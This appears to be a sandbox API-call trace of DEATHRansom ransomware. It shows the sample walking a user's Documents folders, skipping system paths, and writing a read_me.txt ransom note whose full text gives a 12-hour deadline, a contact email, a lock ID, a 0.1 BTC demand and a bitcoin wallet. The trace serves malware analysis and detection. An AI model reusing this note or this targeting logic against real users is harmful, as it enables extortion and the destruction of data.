lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2426610, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2426610, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.261] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.") returned 45 [0075.261] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.261] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.261] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2426610, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2426610, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.261] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\..") returned 46 [0075.261] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.261] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b306110, ftCreationTime.dwHighDateTime=0x1d58463, ftLastAccessTime.dwLowDateTime=0x4f705aa0, ftLastAccessTime.dwHighDateTime=0x1d53b0b, ftLastWriteTime.dwLowDateTime=0x4f705aa0, ftLastWriteTime.dwHighDateTime=0x1d53b0b, nFileSizeHigh=0x0, nFileSizeLow=0xb7b4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="0tm45Vd-10FUKtTqfmOc.docx", cAlternateFileName="0TM45V~1.DOC")) returned 1 [0075.261] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0tm45Vd-10FUKtTqfmOc.docx") returned 69 [0075.261] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51a0cc80, ftCreationTime.dwHighDateTime=0x1d53758, ftLastAccessTime.dwLowDateTime=0x884b5850, ftLastAccessTime.dwHighDateTime=0x1d57bf9, ftLastWriteTime.dwLowDateTime=0x884b5850, ftLastWriteTime.dwHighDateTime=0x1d57bf9, nFileSizeHigh=0x0, nFileSizeLow=0xc461, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3ZF0vW0u2.xlsx", cAlternateFileName="3ZF0VW~1.XLS")) returned 1 [0075.261] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3ZF0vW0u2.xlsx") returned 58 [0075.261] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5817beb0, ftCreationTime.dwHighDateTime=0x1d55d47, ftLastAccessTime.dwLowDateTime=0x73f79d80, ftLastAccessTime.dwHighDateTime=0x1d56ada, ftLastWriteTime.dwLowDateTime=0x73f79d80, ftLastWriteTime.dwHighDateTime=0x1d56ada, nFileSizeHigh=0x0, nFileSizeLow=0xcc5e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="6CT5st-Mp.xlsx", cAlternateFileName="6CT5ST~1.XLS")) returned 1 [0075.261] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6CT5st-Mp.xlsx") returned 58 [0075.261] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70aee290, ftCreationTime.dwHighDateTime=0x1d4d526, ftLastAccessTime.dwLowDateTime=0xa612ace0, ftLastAccessTime.dwHighDateTime=0x1d4cfe1, ftLastWriteTime.dwLowDateTime=0xa612ace0, ftLastWriteTime.dwHighDateTime=0x1d4cfe1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="8Bn0vYqIGbef7_rt", cAlternateFileName="8BN0VY~1")) returned 1 [0075.261] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt") returned 60 [0075.261] lstrcmpW (lpString1="8Bn0vYqIGbef7_rt", lpString2="..") returned 1 [0075.261] lstrcmpW (lpString1="8Bn0vYqIGbef7_rt", lpString2=".") returned 1 [0075.261] StrStrW (lpFirst="8bn0vyqigbef7_rt", lpSrch="programdata") returned 0x0 [0075.261] StrStrW (lpFirst="8bn0vyqigbef7_rt", lpSrch="$recycle.bin") returned 0x0 [0075.261] StrStrW (lpFirst="8bn0vyqigbef7_rt", lpSrch="program files") returned 0x0 [0075.261] StrStrW (lpFirst="8bn0vyqigbef7_rt", lpSrch="windows") returned 0x0 [0075.261] StrStrW (lpFirst="8bn0vyqigbef7_rt", lpSrch="all users") returned 0x0 [0075.261] StrStrW (lpFirst="8bn0vyqigbef7_rt", lpSrch="appdata") returned 0x0 [0075.261] GetProcessHeap () returned 0x4f10000 [0075.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b900d0 [0075.261] lstrcpyW (in: lpString1=0x8b900d0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt" [0075.261] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 45 [0075.261] QueueUserWorkItem (Function=0x40a710, Context=0x8b900d0, Flags=0x0) returned 1 [0075.261] GetProcessHeap () returned 0x4f10000 [0075.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ba00d8 [0075.262] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\*") returned 62 [0075.262] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70aee290, ftCreationTime.dwHighDateTime=0x1d4d526, ftLastAccessTime.dwLowDateTime=0xa612ace0, ftLastAccessTime.dwHighDateTime=0x1d4cfe1, ftLastWriteTime.dwLowDateTime=0xa612ace0, ftLastWriteTime.dwHighDateTime=0x1d4cfe1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.263] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\.") returned 62 [0075.263] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.263] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.263] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70aee290, ftCreationTime.dwHighDateTime=0x1d4d526, ftLastAccessTime.dwLowDateTime=0xa612ace0, ftLastAccessTime.dwHighDateTime=0x1d4cfe1, ftLastWriteTime.dwLowDateTime=0xa612ace0, ftLastWriteTime.dwHighDateTime=0x1d4cfe1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.263] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\..") returned 63 [0075.263] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.263] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d22c910, ftCreationTime.dwHighDateTime=0x1d4cb02, ftLastAccessTime.dwLowDateTime=0xff2be640, ftLastAccessTime.dwHighDateTime=0x1d4d47b, ftLastWriteTime.dwLowDateTime=0xff2be640, ftLastWriteTime.dwHighDateTime=0x1d4d47b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="-qLf9qdmX0YqXMSteXaW", cAlternateFileName="-QLF9Q~1")) returned 1 [0075.263] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW") returned 81 [0075.263] lstrcmpW (lpString1="-qLf9qdmX0YqXMSteXaW", lpString2="..") returned 1 [0075.263] lstrcmpW (lpString1="-qLf9qdmX0YqXMSteXaW", lpString2=".") returned 1 [0075.263] StrStrW (lpFirst="-qlf9qdmx0yqxmstexaw", lpSrch="programdata") returned 0x0 [0075.263] StrStrW (lpFirst="-qlf9qdmx0yqxmstexaw", lpSrch="$recycle.bin") returned 0x0 [0075.263] StrStrW (lpFirst="-qlf9qdmx0yqxmstexaw", lpSrch="program files") returned 0x0 [0075.263] StrStrW (lpFirst="-qlf9qdmx0yqxmstexaw", lpSrch="windows") returned 0x0 [0075.263] StrStrW (lpFirst="-qlf9qdmx0yqxmstexaw", lpSrch="all users") returned 0x0 [0075.263] StrStrW (lpFirst="-qlf9qdmx0yqxmstexaw", lpSrch="appdata") returned 0x0 [0075.263] GetProcessHeap () returned 0x4f10000 [0075.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bb00e0 [0075.264] lstrcpyW (in: lpString1=0x8bb00e0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW" [0075.264] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 46 [0075.264] QueueUserWorkItem (Function=0x40a710, Context=0x8bb00e0, Flags=0x0) returned 1 [0075.264] GetProcessHeap () returned 0x4f10000 [0075.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bc00e8 [0075.265] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\*") returned 83 [0075.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d22c910, ftCreationTime.dwHighDateTime=0x1d4cb02, ftLastAccessTime.dwLowDateTime=0xff2be640, ftLastAccessTime.dwHighDateTime=0x1d4d47b, ftLastWriteTime.dwLowDateTime=0xff2be640, ftLastWriteTime.dwHighDateTime=0x1d4d47b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.265] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\.") returned 83 [0075.265] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.265] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.265] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d22c910, ftCreationTime.dwHighDateTime=0x1d4cb02, ftLastAccessTime.dwLowDateTime=0xff2be640, ftLastAccessTime.dwHighDateTime=0x1d4d47b, ftLastWriteTime.dwLowDateTime=0xff2be640, ftLastWriteTime.dwHighDateTime=0x1d4d47b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.265] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\..") returned 84 [0075.265] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.265] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765e31e0, ftCreationTime.dwHighDateTime=0x1d4cc58, ftLastAccessTime.dwLowDateTime=0xcc51b4d0, ftLastAccessTime.dwHighDateTime=0x1d4d1f0, ftLastWriteTime.dwLowDateTime=0xcc51b4d0, ftLastWriteTime.dwHighDateTime=0x1d4d1f0, nFileSizeHigh=0x0, nFileSizeLow=0x18f12, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bb1BK5wvdL X.odp", cAlternateFileName="BB1BK5~1.ODP")) returned 1 [0075.265] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\bb1BK5wvdL X.odp") returned 98 [0075.265] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c66dde0, ftCreationTime.dwHighDateTime=0x1d4cf47, ftLastAccessTime.dwLowDateTime=0xcf39bf80, ftLastAccessTime.dwHighDateTime=0x1d4cb1f, ftLastWriteTime.dwLowDateTime=0xcf39bf80, ftLastWriteTime.dwHighDateTime=0x1d4cb1f, nFileSizeHigh=0x0, nFileSizeLow=0x15774, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bw-7fnZ.odp", cAlternateFileName="")) returned 1 [0075.265] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\bw-7fnZ.odp") returned 93 [0075.265] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e98c640, ftCreationTime.dwHighDateTime=0x1d4d08b, ftLastAccessTime.dwLowDateTime=0x53a8df70, ftLastAccessTime.dwHighDateTime=0x1d4c9a5, ftLastWriteTime.dwLowDateTime=0x53a8df70, ftLastWriteTime.dwHighDateTime=0x1d4c9a5, nFileSizeHigh=0x0, nFileSizeLow=0x1b1a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="E77BCsVsDojphSy.ppt", cAlternateFileName="E77BCS~1.PPT")) returned 1 [0075.266] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\E77BCsVsDojphSy.ppt") returned 101 [0075.266] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe66f0b20, ftCreationTime.dwHighDateTime=0x1d4d1e5, ftLastAccessTime.dwLowDateTime=0xf995e4c0, ftLastAccessTime.dwHighDateTime=0x1d4d358, ftLastWriteTime.dwLowDateTime=0xf995e4c0, ftLastWriteTime.dwHighDateTime=0x1d4d358, nFileSizeHigh=0x0, nFileSizeLow=0x90dc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rePTuEhAK.ots", cAlternateFileName="REPTUE~1.OTS")) returned 1 [0075.266] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\rePTuEhAK.ots") returned 95 [0075.266] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e469f0, ftCreationTime.dwHighDateTime=0x1d4c5c9, ftLastAccessTime.dwLowDateTime=0xce3437b0, ftLastAccessTime.dwHighDateTime=0x1d4cc22, ftLastWriteTime.dwLowDateTime=0xce3437b0, ftLastWriteTime.dwHighDateTime=0x1d4cc22, nFileSizeHigh=0x0, nFileSizeLow=0x17f8a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="R_P0TZ.rtf", cAlternateFileName="")) returned 1 [0075.266] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\R_P0TZ.rtf") returned 92 [0075.266] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23658d0, ftCreationTime.dwHighDateTime=0x1d4d3b9, ftLastAccessTime.dwLowDateTime=0xb3b72b00, ftLastAccessTime.dwHighDateTime=0x1d4d158, ftLastWriteTime.dwLowDateTime=0xb3b72b00, ftLastWriteTime.dwHighDateTime=0x1d4d158, nFileSizeHigh=0x0, nFileSizeLow=0x6d68, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="u_S_Ou6zrS.rtf", cAlternateFileName="U_S_OU~1.RTF")) returned 1 [0075.266] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\u_S_Ou6zrS.rtf") returned 96 [0075.266] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23658d0, ftCreationTime.dwHighDateTime=0x1d4d3b9, ftLastAccessTime.dwLowDateTime=0xb3b72b00, ftLastAccessTime.dwHighDateTime=0x1d4d158, ftLastWriteTime.dwLowDateTime=0xb3b72b00, ftLastWriteTime.dwHighDateTime=0x1d4d158, nFileSizeHigh=0x0, nFileSizeLow=0x6d68, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="u_S_Ou6zrS.rtf", cAlternateFileName="U_S_OU~1.RTF")) returned 0 [0075.266] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.266] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\read_me.txt") returned 93 [0075.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\-qlf9qdmx0yqxmstexaw\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.266] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.266] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.267] CloseHandle (hObject=0x7b8) returned 1 [0075.267] GetProcessHeap () returned 0x4f10000 [0075.267] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bc00e8 | out: hHeap=0x4f10000) returned 1 [0075.267] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c25680, ftCreationTime.dwHighDateTime=0x1d4c544, ftLastAccessTime.dwLowDateTime=0x51c53c0, ftLastAccessTime.dwHighDateTime=0x1d4c5fc, ftLastWriteTime.dwLowDateTime=0x51c53c0, ftLastWriteTime.dwHighDateTime=0x1d4c5fc, nFileSizeHigh=0x0, nFileSizeLow=0x14766, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="8x-34OVBDypJWOE.csv", cAlternateFileName="8X-34O~1.CSV")) returned 1 [0075.267] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\8x-34OVBDypJWOE.csv") returned 80 [0075.267] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d5f60, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0x45c23a30, ftLastAccessTime.dwHighDateTime=0x1d4c9d9, ftLastWriteTime.dwLowDateTime=0x45c23a30, ftLastWriteTime.dwHighDateTime=0x1d4c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x273b, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9jf7wCxNUfpySfJ4Jx.ods", cAlternateFileName="9JF7WC~1.ODS")) returned 1 [0075.267] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\9jf7wCxNUfpySfJ4Jx.ods") returned 83 [0075.267] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff48390, ftCreationTime.dwHighDateTime=0x1d4d5ab, ftLastAccessTime.dwLowDateTime=0x8349a2d0, ftLastAccessTime.dwHighDateTime=0x1d4c5c4, ftLastWriteTime.dwLowDateTime=0x8349a2d0, ftLastWriteTime.dwHighDateTime=0x1d4c5c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CXq6NUTJ 99V2-v6", cAlternateFileName="CXQ6NU~1")) returned 1 [0075.267] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6") returned 77 [0075.267] lstrcmpW (lpString1="CXq6NUTJ 99V2-v6", lpString2="..") returned 1 [0075.267] lstrcmpW (lpString1="CXq6NUTJ 99V2-v6", lpString2=".") returned 1 [0075.268] StrStrW (lpFirst="cxq6nutj 99v2-v6", lpSrch="programdata") returned 0x0 [0075.268] StrStrW (lpFirst="cxq6nutj 99v2-v6", lpSrch="$recycle.bin") returned 0x0 [0075.268] StrStrW (lpFirst="cxq6nutj 99v2-v6", lpSrch="program files") returned 0x0 [0075.268] StrStrW (lpFirst="cxq6nutj 99v2-v6", lpSrch="windows") returned 0x0 [0075.268] StrStrW (lpFirst="cxq6nutj 99v2-v6", lpSrch="all users") returned 0x0 [0075.268] StrStrW (lpFirst="cxq6nutj 99v2-v6", lpSrch="appdata") returned 0x0 [0075.268] GetProcessHeap () returned 0x4f10000 [0075.268] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bc00e8 [0075.268] lstrcpyW (in: lpString1=0x8bc00e8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS 